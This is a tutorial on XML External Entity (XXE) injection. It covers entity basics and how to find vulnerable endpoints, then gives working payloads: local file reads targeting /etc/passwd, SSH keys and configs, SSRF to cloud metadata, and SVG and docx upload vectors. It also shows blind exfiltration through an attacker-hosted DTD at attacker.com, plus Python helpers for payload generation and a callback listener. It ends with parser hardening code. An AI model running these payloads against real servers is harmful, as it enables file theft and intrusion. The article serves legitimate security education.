XML External Entity (XXE) injection is a class of attack that exploits insecure XML parsers to read arbitrary files from the server, perform server-side request forgery, and in some cases achieve remote code execution. Despite XML being “old technology,” XXE vulnerabilities still appear regularly in modern applications, especially in APIs, document upload features, and SOAP web services. In the OWASP Top 10 (2021) it falls under A05 (Security Misconfiguration); in the 2017 edition it was a standalone entry (A4: XML External Entities).
Understanding XML and External Entities
XML allows you to define entities — essentially variables that the parser replaces with their values when processing the document. External entities extend this by fetching content from a URL or file path:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY example "Hello World">
]>
<root>&example;</root>
When the parser processes &example;, it replaces it with “Hello World”. An external entity fetches the replacement value from an external source:
<!ENTITY ext SYSTEM "file:///etc/passwd">
If the parser resolves this entity and includes the content in the response, the attacker reads /etc/passwd. That’s XXE.
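To watch entity substitution happen, here is a minimal sketch using Python's standard-library xml.etree.ElementTree (the choice of parser is an assumption of this example, not something the article prescribes). It parses the internal-entity document shown earlier and reads back the expanded text.

```python
import xml.etree.ElementTree as ET

# The internal-entity document from above, passed as bytes so the
# encoding declaration is handled by the parser itself.
DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY example "Hello World">
]>
<root>&example;</root>"""

root = ET.fromstring(DOC)
expanded = root.text  # by now the parser has substituted &example;
print(expanded)
```

Internal entities like this one are expanded by most parsers; whether an external (SYSTEM) entity is also fetched depends on the parser and its configuration.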
Finding XXE Vulnerabilities
XXE requires the application to:
- Parse XML input
- Have external entity processing enabled (often the default)
Look for these entry points:
- File upload features that accept .xml, .docx, .xlsx, .svg, .pdf (PDF generators often use XML internally)
- SOAP API endpoints (SOAP is XML-based)
- REST APIs with Content-Type: application/xml
- JSON endpoints that also accept XML (change Content-Type and test)
- RSS/Atom feed parsers
Tip: Even endpoints that normally accept JSON may fall back to XML parsing. Change the Content-Type header to application/xml and submit an XML body.
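The Content-Type switch described in the tip can be sketched as follows. This is an illustration under assumptions: the function name build_xml_probe, the wrapper element root, and the URL target.example are all hypothetical, and the sketch only handles a flat JSON object. It builds the request without sending it.

```python
import urllib.request
import xml.etree.ElementTree as ET


def build_xml_probe(url: str, json_fields: dict) -> urllib.request.Request:
    """Re-encode a flat JSON body as XML and label it application/xml."""
    root = ET.Element("root")  # hypothetical wrapper element name
    for key, value in json_fields.items():
        ET.SubElement(root, key).text = str(value)
    body = ET.tostring(root, encoding="utf-8", xml_declaration=True)
    return urllib.request.Request(
        url,
        data=body,
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


# Nothing is sent here; the request object is only constructed.
probe = build_xml_probe("https://target.example/api/user", {"username": "alice"})
print(probe.data.decode("utf-8"))
```

If the endpoint answers this request the same way it answers the JSON version, it is parsing XML and is worth testing further.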
Basic XXE: Reading Local Files
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInfo>
<username>&xxe;</username>
</userInfo>
If the application reflects the <username> value in the response and the parser resolves external entities, you’ll see the contents of /etc/passwd in the response body.
Windows targets:
<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
Sensitive files to target:
/etc/passwd # User accounts
/etc/shadow # Password hashes (requires root-level access)
/proc/self/environ # Environment variables (may contain secrets)
/proc/self/cmdline # Running process command line
/home/<user>/.ssh/id_rsa # SSH private key (file:// URIs do not expand ~, so use the absolute path)
/var/www/html/config.php # Web app config (database credentials)
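When working through a list of target files, it can help to generate the basic payload from a template. The sketch below assumes the same userInfo/username structure as the example above; the helper names file_uri and file_read_payload are hypothetical.

```python
from urllib.parse import quote

TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "{uri}">
]>
<userInfo>
<username>&xxe;</username>
</userInfo>"""


def file_uri(path: str, windows: bool = False) -> str:
    """Turn an absolute path into a file:// URI."""
    normalised = path.replace("\\", "/")
    if windows:
        normalised = "/" + normalised  # C:/... becomes /C:/...
    return "file://" + quote(normalised, safe="/:")


def file_read_payload(path: str, windows: bool = False) -> str:
    """Return the basic file-read payload for one target path."""
    return TEMPLATE.format(uri=file_uri(path, windows))


payloads = [file_read_payload(p) for p in ("/etc/passwd", "/proc/self/cmdline")]
win_payload = file_read_payload("C:/Windows/System32/drivers/etc/hosts", windows=True)
print(payloads[0])
```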
XXE for SSRF
External entities aren’t limited to file://. The http:// scheme turns XXE into SSRF:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<data>&xxe;</data>
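This hits the AWS instance metadata service (IMDS) endpoint from the server’s perspective, with the same impact as a direct SSRF vulnerability. A plain GET like this only works against IMDSv1; IMDSv2 requires a session token obtained with a PUT request, which an external entity cannot issue. You can also probe internal services: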
<!ENTITY xxe SYSTEM "http://192.168.1.10:8080/admin/">
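To reason about what a given system identifier would reach, a small classifier can help when triaging payloads or reviewing logged entity declarations. This is a sketch using only the standard library; the function name classify_system_id and its category labels are assumptions made for illustration.

```python
import ipaddress
from urllib.parse import urlsplit


def classify_system_id(system_id: str) -> str:
    """Roughly categorise where an external entity URI points."""
    parts = urlsplit(system_id)
    if parts.scheme == "file":
        return "local-file"
    if parts.scheme not in ("http", "https"):
        return "other-scheme"
    try:
        addr = ipaddress.ip_address(parts.hostname or "")
    except ValueError:
        return "hostname"  # would need DNS resolution to judge further
    if addr.is_link_local:
        return "link-local"  # 169.254.0.0/16, where cloud metadata lives
    if addr.is_private or addr.is_loopback:
        return "internal-network"
    return "public"


for uri in (
    "file:///etc/passwd",
    "http://169.254.169.254/latest/meta-data/",
    "http://192.168.1.10:8080/admin/",
):
    print(uri, "->", classify_system_id(uri))
```

The link-local check comes first because Python's ipaddress module also reports that range as private.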
Blind XXE: Out-of-Band Exfiltration
When the XXE payload succeeds but the response doesn’t reflect the entity content (blind XXE), you need out-of-band exfiltration via DNS or HTTP callbacks.
DNS-Based Detection
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://abc123.burpcollaborator.net/">
]>
<data>&xxe;</data>
A DNS lookup to your Burp Collaborator domain confirms the parser resolves external entities.
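When testing several endpoints, a unique subdomain per payload makes it possible to tell which request triggered a callback. The sketch below assumes a callback domain you control; oob.example.test and the function name detection_payload are placeholders, not real infrastructure.

```python
import secrets

OOB_DOMAIN = "oob.example.test"  # hypothetical callback domain you control


def detection_payload(label: str) -> tuple[str, str]:
    """Return (callback_host, payload) tagged with a unique token.

    `label` should contain only DNS-safe characters (letters, digits, hyphens).
    """
    token = f"{label}-{secrets.token_hex(4)}"
    host = f"{token}.{OOB_DOMAIN}"
    payload = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY xxe SYSTEM "http://{host}/">\n'
        "]>\n"
        "<data>&xxe;</data>"
    )
    return host, payload


host, payload = detection_payload("upload-api")
print(host)
```

Record the host alongside the endpoint it was sent to, then match incoming DNS or HTTP interactions against that record.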
HTTP-Based File Exfiltration
Host a malicious DTD on your server (http://attacker.com/evil.dtd):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfil "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?data=%file;'>">
%exfil;
%send;
Then reference it in your payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<data>trigger</data>
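The server fetches your DTD, which defines one parameter entity that reads the file and a second that sends the contents to your server as a query string parameter. The DTD has to be hosted externally because the XML specification does not allow parameter entity references inside markup declarations in the internal subset. This technique works even when the response body doesn’t reflect entity values. Files containing newlines or other characters that are invalid in a URL may fail to exfiltrate this way on some parsers.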
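On the receiving side, all that is needed is something that records the data parameter of incoming requests. The following is a minimal sketch built on Python's http.server; the names extract_exfil, ExfilHandler, and serve are hypothetical, and serving evil.dtd itself is left out.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlsplit


def extract_exfil(request_path: str) -> Optional[str]:
    """Return the value of the `data` query parameter, if present."""
    query = urlsplit(request_path).query
    values = parse_qs(query, keep_blank_values=True).get("data")
    return values[0] if values else None


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        leaked = extract_exfil(self.path)
        if leaked is not None:
            # Log the source address and the URL-decoded value.
            print(f"[{self.client_address[0]}] {leaked}")
        self.send_response(200)
        self.end_headers()


def serve(port: int = 8000) -> None:
    """Block and log callbacks until interrupted."""
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()
```

Calling serve() starts the listener. Note that parse_qs decodes percent-encoding and turns "+" into a space, so the logged value may differ slightly from the raw file contents.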
XXE via SVG Upload
SVG files are XML, and many image processing libraries parse external entities. Upload this as a .svg:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<text>&xxe;</text>
</svg>
If the application renders the SVG (for thumbnail generation, for example), the server hostname appears in the output.
XXE via Office Documents
Modern Office formats (.docx, .xlsx, .pptx) are ZIP archives containing XML files. Open a .docx, edit word/document.xml, and inject an XXE payload:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE doc [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
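<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:body><w:p><w:r><w:t>&xxe;</w:t></w:r></w:p></w:body>
</w:document>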
Repack the ZIP and upload the modified .docx. If the server’s document processing library parses it without disabling external entities, you read the file.
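The unpack, edit, and repack cycle can be scripted with Python's zipfile module. This is a sketch: replace_docx_part is a hypothetical helper, not part of any library, and it copies every archive member unchanged except the one being replaced.

```python
import io
import zipfile


def replace_docx_part(docx_bytes: bytes, part: str, new_xml: bytes) -> bytes:
    """Return a copy of the archive with one member's content replaced."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            if item.filename == part:
                data = new_xml
            else:
                data = src.read(item.filename)
            # Reusing the ZipInfo keeps the member name and metadata.
            dst.writestr(item, data)
    return out.getvalue()


# Usage (file names are placeholders):
#   original = open("report.docx", "rb").read()
#   modified = replace_docx_part(original, "word/document.xml", payload_xml)
#   open("report-xxe.docx", "wb").write(modified)
```

Working in memory avoids the common mistake of zipping the parent folder, which produces an archive with the wrong internal paths.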
Using Burp Suite to Test XXE
- Intercept a request containing XML with Burp Proxy and send it to Repeater.
- Add the DOCTYPE declaration after the XML declaration.
- Define an external entity referencing file:///etc/passwd.
- Reference the entity inside an existing XML element that’s reflected in the response.
- Check the response for file contents.
Burp Scanner’s active scan (available in Burp Suite Professional) also tests for XXE automatically when it detects XML input.
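The manual edit made in Repeater can also be expressed as a small text transformation. The sketch below is a regex-based approximation, not a full XML rewriter; inject_xxe is a hypothetical name, and if the chosen element is not found the body is returned with only the DOCTYPE added.

```python
import re

DOCTYPE = '<!DOCTYPE foo [\n<!ENTITY xxe SYSTEM "{uri}">\n]>\n'


def inject_xxe(xml_body: str, element: str, uri: str = "file:///etc/passwd") -> str:
    """Add a DOCTYPE with an external entity and reference it in `element`."""
    doctype = DOCTYPE.format(uri=uri)
    # Place the DOCTYPE right after the XML declaration, if there is one.
    decl = re.match(r"\s*<\?xml[^>]*\?>\s*", xml_body)
    if decl:
        body = xml_body[:decl.end()] + doctype + xml_body[decl.end():]
    else:
        body = doctype + xml_body
    # Swap the first matching element's text for the entity reference.
    name = re.escape(element)
    pattern = re.compile(rf"(<{name}(?:\s[^>]*)?>).*?(</{name}>)", re.S)
    return pattern.sub(lambda m: f"{m.group(1)}&xxe;{m.group(2)}", body, count=1)


original = '<?xml version="1.0"?>\n<userInfo><username>bob</username></userInfo>'
print(inject_xxe(original, "username"))
```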
Preventing XXE
Disable External Entity Processing
The safest fix is disabling DTD processing entirely at the parser level:
Java (DocumentBuilderFactory):
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
Python (lxml):
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
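PHP (before 8.0; the function is deprecated from 8.0 on, where libxml 2.9+ no longer loads external entities by default, so avoid passing LIBXML_NOENT):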
libxml_disable_entity_loader(true);
Use JSON Where Possible
If your API doesn’t need XML, use JSON. No XML parser, no XXE.
Input Validation and WAF Rules
As an additional layer, reject XML input containing <!DOCTYPE or <!ENTITY declarations. Web application firewalls (WAFs) should have XXE signatures enabled, though they can often be bypassed and should not be the sole defense.
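Rejecting DOCTYPE declarations is more robust when the parser does the detection rather than a string match, since a substring check can be sidestepped with alternative encodings. The sketch below uses the standard-library expat bindings; DTDForbidden and reject_dtd are names chosen for this example (the defusedxml package applies a similar idea).

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when a document carries a DOCTYPE declaration."""


def reject_dtd(xml_bytes: bytes) -> None:
    """Parse the input and raise DTDForbidden at the first DOCTYPE."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    # Malformed input raises xml.parsers.expat.ExpatError instead.
    parser.Parse(xml_bytes, True)


reject_dtd(b"<data>ok</data>")  # passes silently
try:
    reject_dtd(b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data>')
except DTDForbidden as exc:
    print("rejected:", exc)
```

Run a check like this before handing the input to the application's real parser, and still configure that parser safely; the pre-check is a second layer, not a replacement.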
Conclusion
XXE is one of those vulnerabilities that looks arcane on paper but is devastatingly simple to exploit when you find it. A single vulnerable XML endpoint can expose the entire server filesystem, internal network topology, and sensitive credentials. Test for XXE anywhere the application processes XML, including hidden attack surfaces like file uploads and API format negotiation. On the defense side, disabling external entity processing at the parser level is the only reliable fix — blocklisting approaches are consistently bypassed.